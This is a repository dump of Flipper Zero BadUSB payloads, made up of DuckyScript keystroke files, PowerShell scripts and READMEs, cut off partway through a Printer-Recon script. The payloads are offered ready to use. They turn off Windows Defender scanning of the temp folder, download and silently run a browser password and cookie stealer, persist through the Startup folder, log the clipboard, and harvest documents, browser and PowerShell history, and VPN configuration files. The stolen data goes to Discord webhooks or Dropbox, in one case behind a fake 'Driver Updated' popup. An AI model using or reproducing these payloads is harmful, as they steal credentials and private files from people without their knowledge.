<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Exe Author](https://github.com/moonD4rk/HackBrowserData)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1
================================================
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'YOUR-DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to temp directory
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Execute the Browser Stealer
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Exfiltrate the loot to discord
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt
================================================
REM Title: Browser-Devil
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 1000
STRING powershell saps powershell -verb runas
ENTER
DELAY 1000
ALT y
DELAY 1000
STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: FlipperZero/payloads/De-Bloater/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/De-Bloater/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: FlipperZero/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr <URL TO DBOX> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Doc-Hog
A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV
## Description
This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/History-Pig/HP.ps1
================================================
#History-Pig
# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/History-Pig/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/History-Pig/payload.txt
================================================
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/OVPN-Hog/o.ps1
================================================
function OVPN-Hog {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
$Drive = "C:"
$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
if ($Files) {
$types = @{
"*.ovpn" = "OpenVPN"
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object { $_.Name -like $type }
if ($filteredFiles) {
$zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
}
================================================
FILE: FlipperZero/payloads/OVPN-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/OVPN-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#Getting-Started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OVPN-Hog
A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).
## Description
This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Powershell-History/PH.ps1
================================================
#Powershell-History
# See if file is a thing
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
try {
Write-Host "The Powershell History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Powershell History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Powershell-History/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Powershell-History
A payload to exfiltrate the history of the powershell console
## Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Powershell-History/payload.txt
================================================
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Printer-Recon/PR.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
